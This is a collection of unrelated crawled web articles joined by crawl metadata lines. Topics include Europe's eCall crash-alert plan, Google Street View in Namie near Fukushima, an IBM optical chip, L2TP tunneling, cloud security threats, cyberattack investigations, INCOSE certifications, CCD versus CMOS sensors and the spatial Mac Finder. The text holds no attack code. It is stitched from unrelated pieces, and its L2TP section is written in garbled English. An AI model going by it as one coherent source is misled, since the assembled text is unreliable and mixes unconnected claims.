Accenture is a global management consulting, technology services and outsourcing company. Committed to delivering innovation, Accenture collaborates with its clients to help them become high-performance businesses and governments. With deep industry and business process expertise, broad global resources and a proven track record, Accenture can mobilize the right people, skills and technologies to help clients improve their performance. With more than 126,000 people in 48 countries, the company generated net revenues of US$15.55 billion for the fiscal year ended Aug. 31, 2005. Its home page is www.accenture.com. | <urn:uuid:083b75f4-36be-4ea1-901e-32b71b6d0ef8> | CC-MAIN-2017-09 | https://newsroom.accenture.com/news/most-executives-believe-workplace-equality-for-women-still-lags-behind-men-2006-accenture-study-shows.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00304-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964948 | 983 | 2.5625 | 3 |
In European plan, cars in a crash would auto-dial for help
Europe appears to be out in front of the United States when it comes to using IT to improve transportation and health care costs across state jurisdictions.
The European Parliament (EP) adopted a resolution this week urging adoption of a law that would require all new cars be to equipped with technology to automatically contact rescue services in the event of a crash, Computerworld reported.
Robo cars get green light in Nevada
The eCall system is estimated to able to speed up the response times of emergency services by 40 per cent in urban areas and by as much as 50 per cent in rural locations, according to the Touchstone Research Lab.
That would result in an estimated 2,500 lives saved a year and reduce injuries by 10 percent to 15 percent, the research firm said.
The eCall device would automatically dial the European emergency services number, 112, in the event of a serious accident, then send data wirelessly from airbag and impact sensors as well as GPS coordinates to local emergency agencies.
The European Commission is aiming to have a fully functional eCall in place throughout the European Union by 2015, according to telecompaper.com
Connect with the GCN staff on Twitter @GCNtech. | <urn:uuid:6d5f8972-1e8d-4c12-9001-dd7231781a58> | CC-MAIN-2017-09 | https://gcn.com/articles/2012/07/05/european-cars-with-sensors-dial-911-after-crash.aspx?admgarea=TC_Mobile | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00480-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.947254 | 258 | 2.53125 | 3 |
A small Japanese town, abandoned because of radiation concerns after the Fukushima nuclear plant disaster in 2011, is working with Google's map service to keep its memory alive.
Google said it will map the streets of Namie, in Fukushima Prefecture northeast Japan using Street View. The town is about 20 kilometers from the nuclear power plant that suffered meltdowns and released radioactive materials after a powerful earthquake and tsunami struck the region two years ago.
The Internet company said in a blog posting that the mapping will take several weeks, and the company aims to post the data online in a few months time.
"All of the residents of our town, 21,000 people, are currently evacuated all over Japan. Everyone wants to know the state of the disaster area, there are a lot of people that need to see how things are," said Tamotsu Baba, town mayor.
"I think there are many people all over the world that want to see images of the tragic conditions of the nuclear accident."
Baba said the town is happy to cooperate with Google in the filming project.
Namie was split between two evacuation zones established by the Japanese government after the Fukushima disaster. It is partly in the "security zone" where access is limited and partly in the "planned evacuation zone," where residents were told to leave within a month's time.
Google said its staff is following recommended national and local guidelines for safety during filming. The company posted about the project on its Japanese blog, including a short video.
"We hope that this project will also help protect against the fading of memories of the disaster, as we approach the two-year mark from when it occurred," wrote project manager Keiichi Kawai. | <urn:uuid:8d535917-61ee-424c-a1bb-c45309c385bf> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2164111/lan-wan/google-street-view-to-map-abandoned-fukushima-town.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00072-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.977078 | 347 | 2.859375 | 3 |
IBM has announced a prototype optical transceiver chipset that can transmit data over optical fiber at speeds of up to 160Gbps. IBM informs us that it's fast enough to transmit "a typical high-definition movie" per second. (Will "typical high-definition movie" replace "Library of Congress" as the SI-approved unit for "a whole lot of data"? Only time will tell.) 160Gbps is over ten times the 13.271 Gbps speed of backbone-class OC-256 fiber.
The main transceiver chip is implemented in a regular CMOS process, and it comes out to about 17mm2 and consumes only 2.5 watts of power. The chip is then packaged together with some other components made of indium phosphide and gallium arsenide to make the complete transceiver device.
IBM's optical announcement sounds very similar to an optical-related announcement from Intel in September of last year. Intel also talked up a hybrid CMOS-based optical transceiver device, with part of the device built in indium phosphide and packaged together with a more conventional CMOS chip containing other components.
The idea behind both of these products is that they point the way toward an eventual replacement of the regular copper-based bus-level interconnect for desktops with much faster, lower-power optical technologies. Currently, the cost and size of the lasers used in optical transmission make fiber optics infeasible for the kinds of short distances that one finds inside a server rack, or within a single server box.
When we see the first commercial hybrid CMOS optical devices from Intel and IBM, they'll probably be used for high-speed networking in the datacenter. In particular, the market for high-performance clusters would love a low-power, low-cost networking technology with such high transfer rates. From there, the technology will migrate onto the motherboard and provide an eventual foundation for future frontside buses and the like.
I recently spoke with Intel about their 80-core Terascale research prototype (more on that when the article goes up this week), and it was clear from that talk that Intel will be making some interconnect-related announcements in the coming year. Furthermore, all signs point to those announcements centering around the same kind of optics technologies that the company has talked up previously and that IBM is touting today. | <urn:uuid:8140b607-f163-43cf-bf06-1d6a106c5738> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2007/03/ibm-announces-160gbps-optical-networking-chip/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00248-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943088 | 480 | 2.578125 | 3 |
L2TP Attributes Summary
Projected L2TP standard was made available in the year 1999 by means of RFC 2661. It was originated primarily from two different tunneling protocols, named as: Point-to-Point communication protocol and PPTP (Point to Point Tunneling protocol). In other words, L2TP (Layer 2 Tunnel Protocol) is an up-and-coming IETF (Internet Engineering Task Force) standard that came in front with the traits of two on-hand tunneling protocols, named as: Cisco’s L2F (Layer 2 Forwarding) and Microsoft’s PPTP (Point-to-Point Tunneling Protocol). L2TP protocol is actually an expanded form of the PPP (a significant constituent for VPNs).
VPNs (virtual private networks) may let the user to connect to the corporate intranets/extranets. VPNs provides cost-effective networking but long-established dial-up networks hold up only registered IP (internet protocol) addresses, which are used to limit the applications types for VPNs. The main reasons for L2TP utilization is its support to multiple protocols along with holding of unregistered and privately directed IP addresses.
L2TP may be used as a part of ISP (internet service provider) delivery of services. But in such cases, it may remain powerless in providing any kind of encryption service for having privacy feature, etc. That’s why it is usually dependant upon an encryption offering protocol.
But L2TPv3 is branded as the latest version of under discussion protocol, which was introduced in RFC 3931(2005). And this most up-to-date version offered added security features, enhanced encapsulation, along with the capacity to take data links, etc.
Packet’s structure for L2TP
An L2TP packet is made up of different fields as: flags and version information (0-15 bits) field, length (16-31bits) field but it is an optional field, Tunnel ID (0-15 bits) field, session ID (16-31 bits) field, Ns (0-15 bits) optional field, Nr (16-31 bits) optional field, offset size (0-15 bits) optional field, offset pad (16-31 bits) optional field and payload data field of variable length.
Packet’s exchange in case of L2TP
At L2TP connection set up time, lots of control packets may be swapped between server side and client side in order to create tunnel and session so to be used for every direction. With control packets help, one peer may request to other peer for the assignment of a particular tunnel plus session id so data packets by using them (tunnel and session id) can make exchanges with the PPP frames.
Further that L2TP control messages list is exchanged in connecting LAC and LNS, for the purpose of handshaking previous to the establishment of a tunnel plus session.
L2TP tunnel models
An L2TP tunnel may make bigger across the complete PPP session or else across simply one part of a session with two segments. Different tunneling models can be used to represent this state of affairs and these models are named as: voluntary tunnel model, compulsory tunnel model (for incoming call), compulsory tunnel model (for remote dial up connection plus L2TP multi-hop connections).
- Supporting Multi-hop
- Operate like a client initiated Virtual Private Network (VPN) solution
- Cisco’s L2F offered value-added traits, as load sharing plus backup support | <urn:uuid:9b146985-072d-4509-881a-0b46482bedb8> | CC-MAIN-2017-09 | https://howdoesinternetwork.com/2013/l2tp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00476-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.874883 | 743 | 3.25 | 3 |
Cloud security is an evolving sub-domain of information security dedicated to the protection of data, applications and infrastructure values associated with cloud computing. It incorporates a broad set of policies that are driven by the security procedures for providing maximum level of assurance for customers of cloud services.
Concerns with Cloud Security
Cloud computing is providing new horizons for maintaining organizational assets. But with ease and the convenience also comes the challenge to secure enterprise data. The biggest reason that raises concerns for security is involvement of third parties, i.e. cloud service providers who can access data stored at remote locations.
Being a form of distributed computing, cloud computing is still waiting for proper standardization. While migrating to cloud services , there are a number of factors to be considered by organization. The organizations need to understand the key benefits along with the risks associated with adopting a particular solution or a service provider. As an evolving security and technological arena, the assessment of risks and benefits keeps on varying depending upon the advancements that are brought by new technological implications.
Cloud security is a shared responsibility model between cloud service provider (CSP) and clients associated with the same. It is important to note that not all cloud service providers provide equal amounts of security measurements and other operational and managerial functions. This should be clearly agreed , defined and discussed between service providers and customers.
More and more organizations are migrating towards the cloud and enjoying the benefits of various service providers. Enterprises are embracing economic and operational advantages of cloud for extending their business to larger scales. But cloud providers like AWS need to meet key security requirements for organizations to be able to trust them with their most confidential data. As malicious attackers are becoming more sophisticated, they are finding new ways to target applications and that data of enterprises. The attacking intentions are fed by the fact that cloud has some architectural flaws inherited from its parent applications that can be easily exploited for one’s own gains. At an unprecedented rate, enterprises tend to shift their resources to cloud. There are many security threats that cloud data is vulnerable to.
Some of them are listed below.
- Data Breaches: One of the most dangerous shortcoming of having data in the cloud is the possibility of compromised data.
- Data Loss: Data in the cloud is physically stored on third party servers and given virtual access to the customers. Therefore, there is a good possibility that the data on the remote servers can be lost due to any kind of damage or server hacking.
- Account Hijacking: Physical access to data is given to clients through user accounts. So all of the data can be accessed only through these accounts on cloud hosting services. In case, any of such accounts are compromised or hijacked by any hacker, all of the important data comes under the risk of being compromised. There is also the possibility of privilege escalation attacks that accounts for exploitation of user level access rights.
- Insecure API’s: Cloud data is called and managed through Application Protocol Interface (API). The API calls can be spoofed or hijacked for infected data transmission.
- Denial of Service: Cloud is basically an interface between a user and an application server. If the cloud server is vulnerable or not properly protected from DOS attacks, then it can be a target of Denial of Service attacks. In this attack, legitimate user is deprived of getting services like data access etc. of the server.
- Malicious Insiders: Sharing data with a third party requires a fair amount of trust to invest. Organizations may be secure from certain attacks from outside the company. However, it needs to be aware from attacks within the organization as well.
- Abusing Cloud Services: Legitimate cloud services can be abused by malicious intents for their own monetary or other gains.
- Shared Technology Issues: Most of the security issues emerge due to shared resources technology adapted by the cloud. All data within one cloud can be attacked by hackers that would render all data on that cloud to be compromised.
- Insufficient Due Diligence: Paying less attention to diligence can also cause substantial amount of threat to data in the cloud.
At an unimaginable rate, cloud computing is transforming and revolutionizing the way business and government are managing their data. Cloud service development has shown more evolution in terms of service model, creating new security challenges on the way for security researchers. The shift from server to service-based thinking is revolving the terms in which technological departments deal with. The design of the architecture is subsequently affected and governed by the computing technology and applications. But these advances have created substantial new security vulnerabilities, including critical security issues whose impact is emerging and still processing with each passing day.
By Chetan Soni | <urn:uuid:9e16fb04-f363-4c46-9373-aceb16f3a689> | CC-MAIN-2017-09 | https://cloudtweaks.com/2014/03/security-concerns-cloud-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00000-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.941729 | 943 | 2.546875 | 3 |
Now that the network is installed, each switch has a bridge ID number, and the root switch has been elected, the next step is for each switch to perform a calculation to determine the best link to the root switch. Each switch will do this by comparing the path cost for each link based on the speed.
For paths that go through one or more other switches, the link costs are added. The switch compares this aggregate value to the other link costs to determine the best path to the root switch.
For example, switch 2 has multiple connections back to the root switch. It selects the 1000 Mbps connection on the trunk (port 1) over the 100 Mbps connection on port 9 because the path cost (see below) for the link is lower. Port 1 is now a forwarding port and port 9 is a blocking port; however, port 9 still receives BPDUs from the root switch.
|Link Speed||10 Mbps||100 Mbps||1 Gbps||10 Gbps|
All ports on the root switch are forwarding ports. Each of the other switches in this network has one forwarding port to the root and one or more blocking ports eliminating the loop in the network.
While the network is functioning, the root and the other switches communicate with each other via BPDUs and maintain timers to monitor the links and make adjustments if necessary.
Here are the common STA timers:
- Hello time: The interval at which the root switch sends out BPDUs. The default setting is two seconds. This is a type of keep-alive message that is a short message indicating that everything is okay and that the root switch is functioning correctly.
- Maximum age time: The time a switch stores a BPDU. The default setting for this is twenty seconds. If the root fails and does not send out its BPDUs, after twenty seconds the switches recognize the problem and enter a listening and learning state to collect information about the network via BPDUs from other switches. If necessary, a new root switch is elected and new links chosen for connecting to the root switch.
- Forward delay time: The duration of the listening and learning states while the network is analyzed by STA. The default setting is fifteen seconds. Normally, a port is either forwarding or blocking, but during the initial implementation or during any other topology changes, a port temporarily enters a listening and learning state to determine who is the root and the best paths back to the root from its perspective.
For example, the root switch goes down and fails to send its BPDUs every two seconds. After twenty seconds, each switch examines its maximum age time and declares that the root switch is down. Each switch enters a fifteen second listening and fifteen second learning state to determine the bridge ID of the new root switch and the path selection to the root switch. It takes a total of fifty seconds to go through this process before network connectivity is fully restored.
When a topology change occurs, the STA identifies the problem and takes corrective action.
As an example, Switch 1 is the root and has two connections to switch 4. Port 1 on the switch is a 100BaseFX connection and port 4 is a 10BaseFL connection. Switch 4 uses port 1 for forwarding and port 4 for blocking.
Suppose an accident occurs. The fiber optic riser cable containing the 100BaseFX connection on port 1 of Switch 4 is cut, so the link is down. After twenty seconds, Switch 4 has not seen any BPDUs on port 1, but continues to receive the BPDUs on port 4. Switch 4 will now change the port status of port 1 to blocking and port 4 to forwarding to provide connectivity from Switch 4 to the root.
If the original 100BaseFX connection is repaired, Switch 4 recognizes the repair when it begins getting the BPDUs on port 1 again. Switch 4 reverts back to the 100 Mbps connection over the 10 Mbps connection because of the path cost comparison.
Your network traffic may require multiple links between switches to handle heavier loads or deal with import links. Normally, when multiple links exist between switches, the Spanning Tree Algorithm disables the redundant links to eliminate a loop in the network.
IEEE’s 802.1ax specification includes the LACP (Link Aggregation Control Protocol). It offers the solution of combing several physical ports into a single logical channel. LACP lets a network switch negotiate automatic link bundling. To do this, a switch sends LACP packets to another directly connected switch that also runs LACP.
LACP sends LACPDUs (LACP Data Units) on all links on which a manager has configured the protocol. If it finds a switch on the other end that a manager has also configured LACP, it will independently send frames on the same links. This lets the two switches detect multiple links between them so they can combine them into a single logical channel.
A manager may configure LACP in active or passive mode. In active mode, it always sends frames on the configured links. In passive mode, it waits to hear LACPDUs before acting. This prevents accidental loops as long as the other device is in active mode. | <urn:uuid:f9f45dab-c74b-4495-be7f-8c7de5c25728> | CC-MAIN-2017-09 | http://blog.globalknowledge.com/2012/10/18/what-happens-if-i-have-more-than-one-switch-with-redundant-links-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00420-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.906925 | 1,054 | 2.859375 | 3 |
Having a military background, I tend to look at all security issues with the perspective of someone who’s served in the armed forces. That means using a thorough investigation process that doesn’t treat any action as accidental or an attack as a stand-alone incident and looking for links between seemingly unconnected events.
This method is used by law enforcement agencies to investigate acts of terrorism, which, sadly, are happening more frequently. While terror attacks that have occurred in the physical world are making headlines, the virtual world is also under attack by sophisticated hackers. However, not much is said about the similarities between investigating both types of attacks or what security researchers can learn from their law enforcement counterparts. I’ve had this thought for awhile and, fearing that I’d be seen as insensitive to recent events, debated whether to write this blog. After much thought, I decided that the stakes are too high to remain silent and continue treating each breach as a one-off event without greater security implications.
The parallels between cyber and terror attacks are numerous: they involve well-coordinated adversaries who have specific goals and planned intricate campaigns months in advance. The target’s security measures are irrelevant and can always be exploited. Preventing cyber and terror attacks is difficult, given the numerous vectors an adversary can use. Discovering one component of either type of attack can lead to clues that reveal an even larger, more detailed operation. But the methods used to investigate cyber attacks often fall short at establishing links between different events and possibly preventing hackers from striking again.
Cyber attacks targeting infrastructure are happening
To date, we haven’t experienced a cyber attack that has caused the same devastation of what’s happened in the physical world. Having your credit card number stolen doesn’t compare to lives being lost. But this doesn’t mean we won’t see cyber attacks that cause major disruptions by targeting critical infrastructure.
In fact, they’re already happening. Just last week the U.S. Department of Justice accused seven Iranians of hacking the computer control system of a dam in New York and coordinating DDoS attacks against the websites of major U.S. banks. According to the DOJ, the hackers would have been able to control the flow of water through the system had a gate on the dam not been disconnected for repairs. Then in December, hackers used malware to take over the control systems of two Ukraine energy plants and cut power to 700,000 people. I’m not trying to spread fear of a cyber apocalypse by mentioning these incidents. Fear mongering isn’t applicable if the events have occurred.
+ ALSO ON NETWORK WORLD U.S. Critical Infrastructure under Cyber-Attack +
When examining terror attacks, police conduct forensic investigations on evidence found at the scene. If suspects are arrested, the police confiscate their smartphones (as we’ve seen with the iPhone used by the shooter in the San Bernardino, Calif., attack) and computers and review information like call logs and browsing histories. These procedures may provide investigators with new information that could lead to other terror plots being exposed, the arrest of additional suspects and intelligence on larger terrorist networks.
Applying an IT perspective to breaches won’t reveal complete cyber attacks
Cyber attacks, on the other hand, are investigated in a manner that isn’t as effective. They’re handled as individual incidents instead of being viewed as pieces of a larger operation. I’ve found that too many security professionals are overly eager to remediate an issue. Considering the greater security picture isn’t factored into the process, nor is it culturally acceptable within most organizations to do so. Corporate security teams have been conditioned to resolve security incidents as quickly as possible, re-image the infected machine and move on to the next incident.
Cyber attacks, though, are multi-faceted and the part that’s the most obvious to detect sometimes serves as a decoy. Adversaries know security teams are trained to quickly shut down a threat so they include a component that’s easy to discover. While this allows a security professional to report that a threat has been eliminated, this sense of security is false. Shutting down one known threat means exactly that: you’re acting on a threat that was discovered. But campaigns contain other threats that are difficult to discover, allowing the attack to continue without the company’s knowledge.
Unfortunately, most companies don’t approach cyber security with either a military or law enforcement perspective. They use IT-based methods and try to block every threat and prevent every attack, approaches that are unrealistic and ineffective given the sophisticated adversaries they’re facing. The clues security teams need to discover, eliminate and mitigate the damage from advanced threats is contained in the incidents they have been resolving.
Cyber security stands to learn a lot from law enforcement when it comes to investigating attacks. Next time they’re looking into a breach, security professionals should:
Not treat a security incident as an individual event. Try to place it in the greater context of what else is occurring in your IT environment. View the attack as a clue that, if followed, can reveal a much larger, more complex operation.
Instead of immediately remediating an incident, consider letting the attack execute to gather more intelligence about the campaign and the adversary.
Remember the threat that’s the most obvious to detect is often used as a decoy to shield a more intricate operation.
While there will always be terrorists and hackers, remembering these points helps us stay ahead of them, minimize the impact of their attacks and regain a sense of control.
This article is published as part of the IDG Contributor Network. Want to Join? | <urn:uuid:ad019e26-a902-4bfe-88fb-5df477b8157d> | CC-MAIN-2017-09 | http://www.networkworld.com/article/3048846/security/what-terrorism-investigations-can-teach-us-about-investigating-cyber-attacks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00420-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958521 | 1,176 | 2.734375 | 3 |
Tweeting under the influence may not get you in as much trouble as drunk driving does, but it can still mean a whole lot of hot water. Now there's an algorithm that can tell when you're drinking while tweeting -- and also figure out where you're imbibing.
Using machine learning, researchers at the University of Rochester have created a system that can find alcohol-related tweets and determine whether they were made by someone who was actually drinking at the time. It can also pick out whether those tweeters were drinking at home or somewhere else.
Equipped with that knowledge, the researchers compared the results for different locations in New York State. Eventually, they hope to use the technology to study the health implications of alcohol.
So, how did they do it?
The researchers began by collecting geotagged tweets sent over 12 months up to July 2014 from New York City and nearby suburban and rural areas. Then they zeroed in on those that included alcohol-related words, such as "drunk" or "beer," and put the Mechanical Turk crowds to work to help confirm the context.
Specifically, Mechanical Turk workers read the tweets to confirm not only that the tweeter was talking about using alcohol personally, but also that he or she was consuming it while tweeting.
To figure out the settings from which the tweeters sent their tweets, the researchers focused on words and phrases that people tend to use in tweets sent from their homes, such as "bath" or "sofa," and confirmed the geolocated results once again via Mechanical Turk.
They used all that information to train a machine-learning algorithm, which they hope to use to better understand alcohol consumption patterns and how they vary with location and other factors. That data could help them do things like relate the number of places to buy alcohol in a region to the amount of home drinking that takes place there.
A paper describing the work will be presented at the International Conference on Web and Social Media in May. | <urn:uuid:2cd2000b-d931-4c35-84be-3c3135bfd313> | CC-MAIN-2017-09 | http://www.itnews.com/article/3045255/are-you-drinking-while-tweeting-this-algorithm-can-tell.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00596-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.97395 | 402 | 2.921875 | 3 |
Historically, CCD (charged coupled device) sensors have existed much longer than CMOS sensors, that is to say, for more than 40 years. Due to constant improvement and optimization over the years, CCD sensors today stand for excellent image quality. In 2009, the American scientists Willard Boyle and George E. Smith were awarded the Nobel Prize for Physics for the invention of the CCD sensor. Originally developed in 1969 for the storage of data, the potential of the charge coupled device as a light sensitive apparatus was soon realized. By 1975, the first sensors with a resolution sufficient for television cameras appeared. However, it took more than 10 years before the process technology was mature enough to begin production of CMOS (complementary metal oxide semiconductor) sensors. In the mid-nineties, the first commercially successful CMOS sensors appeared on the market.
CMOS sensors are based on the same physical principles as CCD sensors. They convert incoming photons into electrons by means of a photo effect. As a result of their sensor structure, the maximum sensitivity of CMOS sensors is in the red spectral region (650 – 700 nm). CCD sensors, not least because of the numerous innovations during their longer technological history, have a maximum at about 550 nm - exactly where the human eye is most sensitive. | <urn:uuid:4bf45a57-f3db-4602-a0ba-c1ea9be221d8> | CC-MAIN-2017-09 | https://www.bsminfo.com/doc/cmos-and-ccd-small-differences-along-the-0001 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00296-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963591 | 263 | 3.75 | 4 |
INCOSE Systems Engineer Certs Offer Broad-Based Skills Validation
The job title of “systems engineer” might not sound all that glamorous at first, but once you consider that these IT pros work on complex systems that can include military aircraft and tanks, the job description suddenly becomes a lot more exciting.
As David Walden, Certified Systems Engineering Professional (CSEP) and INCOSE certification program manager, explained it, a systems engineer is an IT professional who heads up a development project on an intricate, software-intensive system. The system engineer has a broad role, looking at the entire system from conception to final disposal.
Take, for example, a nuclear reactor. Walden said the systems engineer would need to consider: “How do you dispose of that system safely, in a way that is both economical and good for the environment? How do you design the system so that it can be easily disassembled or reused or recycled?
“[Ultimately], a systems engineer looks at the whole problem and interfaces with the customer to determine what the real need is, envision what that system will be and then make sure it’s delivered and meets and exceeds [the] customer’s expectations,” Walden said.
“They translate all of those vague and soft-and-fuzzy stakeholder [requirements] — ‘I want a car that goes fast,’ ‘I want a rocket ship that can be launched 42 times’ — and then they work with the design engineers to make that a technical reality.”
Like many roles in the IT industry, there are organizations dedicated to training and certifying systems engineers. One such organization is the International Council on Systems Engineering (INCOSE). The professional society — created in 1990 — serves more than 6,000 professionals worldwide through its efforts to provide education and development opportunities to the global systems engineering community. INCOSE also establishes professional standards for the field.
Earlier this year, INCOSE upgraded its certification program to a three-tiered model. CSEP is the core certification for the program and validates a foundational level of systems engineering knowledge. This exam — created in 2004 — was upgraded in July in conjunction with the release of a new version of INCOSE’s Systems Engineering Handbook: Version 3.1. This upgrade gives the exam an international perspective, using international standard ISO/IEC 15288.
The CSEP is for professionals with a minimum bachelor’s degree in science or a technical subject, along with five years of experience in systems engineering. The degree also can be replaced by additional years of experience.
While upgrading the exam, INCOSE also added a specialization option in Department of Defense acquisition (CSEP Acq). This exam, which must be completed either concurrently or after passing the core CSEP exam, validates knowledge of systems engineering within a U.S. Department of Defense (DOD) acquisition environment. This certification is ideal for both current DOD professionals — to help them climb the career ladder — and industry professionals who work on government contracts and want to highlight their credibility and understanding of the DOD development process.
Also new to INCOSE certifications is the entry-level Associate Systems Engineering Professional (ASEP). The ASEP certification requires passing the same exam for the CSEP, as well as a bachelor’s degree, only the ASEP does not require an experience component. The ASEP is good for up to 10 years, by which time INCOSE expects the professional to have upgraded to CSEP status.
And for seasoned systems engineers, INCOSE will unveil its Expert Systems Engineering Professional (ESEP) certification in 2009.
“ESEP is targeted for a very limited audience of senior leaders in system engineering,” Walden explained. “And the way that we [will validate] that is not through a knowledge exam, but through a detailed interview process with the applicant and [his or her] references.”
In order for the credentials to be renewed — which is every three years for CSEP and five for ASEP — INCOSE certifications also require participation in continuing learning experiences within an allotted time period.
“The two main ways that you can earn PDUs [professional development units] are through taking some type of professional development such as university courses [or] internal training courses, [or] through volunteering,” which can include giving a paper at a systems engineering event or working on a professional standards committee, Walden said.
“The reason that we have a requirement for renewal is we want this to be a lifelong learning process,” he said.
– Mpolakowski, email@example.com “ | <urn:uuid:a375d8dc-a4a8-4a8c-a262-14fe93f23893> | CC-MAIN-2017-09 | http://certmag.com/incose-systems-engineer-certs-offer-broad-based-skills-validation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00348-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951683 | 977 | 2.53125 | 3 |
Cyberkinetics, makers of the BrainGate, a neural implant that the physically impaired can use to control computers, said it will file an investigational device exemption with the FDA to conduct a pilot clinical trial this year.
Five quadriplegic participants will receive the implant.
BrainGate is a brain-computer interface consisting of an internal neural signal sensor and external processors that convert neural signals into output signals that a person controls and uses to operate a PC. The sensor consists of a tiny chip smaller than a children's aspirin, with 100 electrode sensors -- each thinner than a hair -- that detect brain cell electrical activity. The chip is implanted on the brain's surface in the area that controls movement. -- Cyberkinetics
The European Space Agency (ESA) has launched SMART-1, the first in a series of "Small Missions for Advanced Research in Technology" missions. The spacecraft is now heading for the moon using a revolutionary propulsion technique and carrying an array of miniaturized instruments, the ESA said.
The main purpose of the SMART-1 mission is to flight-test new solar-electric propulsion technology -- a kind of solar-powered thruster, or "ion" engine, that is 10 times more efficient than the usual chemical systems used for space travel.
Solar-electric propulsion does not burn fuel as chemical rockets do. The technique converts sunlight into electricity via solar panels and uses it to electrically charge heavy gas atoms, which accelerate away from the spacecraft at high speed and drive the spacecraft forward. -- The European Space Agency
X Doesn't Mark the Spot
Researchers from Lucent Technologies' Bell Labs have developed new software that gives users tighter control over the sharing of location information generated by cell phones, personal digital assistants and other mobile devices.
Bell Labs' newly developed Privacy-Conscious Personalization framework relies on user preferences to intelligently infer a user's context, such as working or shopping, and then determines how that location information should be shared.
When a user's location or other information is requested, the request is checked against the user's preferences and filtered through a high-performance rules engine, known within Bell Labs as "Houdini," before any action is taken. Since location and other mobile services require near-real-time performance, this entire process can take a few milliseconds or less. -- Bell Labs
Video Game Workout
Powergrid Fitness' kiloWatt -- a new game controller for Sony PlayStation 2, Microsoft Xbox and PC games -- turns video games into workouts.
Powergrid Fitness took the two thumb-stick controls on standard PlayStation 2 and Xbox game controllers and blended them together into a single shoulder-height joystick. When you push it, sensitive strain gauge sensors measure the microscopic flex in the alloy metal resistance rod, and a microprocessor calculates how hard you're pushing.
kiloWatt measures force rather than motion, and kiloWatt's sensors are adjustable in real time, so the effort level can be made easy, brutal or somewhere in between. The kiloWatt system is composed of a structural steel platform base, an alloy steel resistance rod, an engineering polymer game controller and a strain gauge sensor array. -- Powergrid Fitness
Toshiba and Digital Fashion Ltd. will jointly create a three-dimensional fashion simulation system to allow virtual modeling and coordination of clothes, cosmetics and accessories in real time.
The system will capture images of people, outfit them in the virtual clothes of their choice, and then display natural-looking images in real time, including movement of the person and the clothes.
The new simulation system will reproduce real-time three-dimensional images of movement in front of a display equipped with cameras, along with the textures, shades and real appearance of the chosen material and clothing. Using the simulation system will offer the same sense of reality as a real mirror. Commercialization of the system is expected in 2006. -- Toshiba | <urn:uuid:e786ef09-5bdd-4081-aaa4-9520cc122212> | CC-MAIN-2017-09 | http://www.govtech.com/health/99413994.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00292-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.894945 | 794 | 2.921875 | 3 |
The Spatial Finder
The only real, physical parts of the personal computer interface are the screen in front of you and the mouse and keyboard under your hands. We will not consider alternate input/output devices in this article. Its what's happening on the screen that we're interested in.
Here we have a veritable blank slate: a two-dimensional image made up of thousands of colored dots. But there are many constraints that are beyond our control--or at least beyond the scope of this article. As I said earlier, this will be a fairly conservative vision of what the Finder could be; the basics of windows, icons, menus, and pointing device ("WIMP") will remain unchanged.
So, what parts of the Finder can benefit from spatial orientation? And what is this "Spatial Finder" that's mentioned so often? Truth be told, I'm not always sure what other people mean when they use that term. But I can tell you my definition.
The Spatial Finder endows its windows with the properties of actual objects in space that are most beneficial to the usability of the application. Again, this is not a blind imitation of reality. Properties of real objects that do not benefit usability are simply not carried over. For example, you can type and then erase characters from a file or folder name forever without causing any eraser smudges.
It's the useful properties of real objects in space that make the Spatial Finder what it is (or "was", since the last Finder that can reasonably be called "spatial" was in Mac OS 9). These properties are:
- Coherency: each window is permanently, unambiguously associated with a single folder.
- Stability: files, folders, and windows go where you move them, stay where you put them, and retain all their other "physical" characteristics: size, shape, color, location, etc.
That's it! It seems simple because it really is. But these two properties have far-reaching consequences that go a long way towards making the Finder more usable.
Objects in the real world are notoriously coherent and stable. It's extremely difficult to get anything more than a one-to-one relationship between, say, your hand and the $20 bill you're holding. The bill is in your hand and your hand is holding the bill. If you could make that same bill appear in one or more other locations simultaneously (or vice versa with your hand), you'd be a very rich (or very handy) person. Similarly, if that bill starts to change size, shape, color, or location without any outside force acting on it, then you're probably asleep and having a very odd dream.
To understand how coherency and stability benefit the Finder, let's consider an even more basic part of the Mac GUI: icons. To paraphrase Arthur C. Clarke, any sufficiently advanced illusion is indistinguishable from reality. Nothing proved this more profoundly than the use of icons in the Mac GUI.
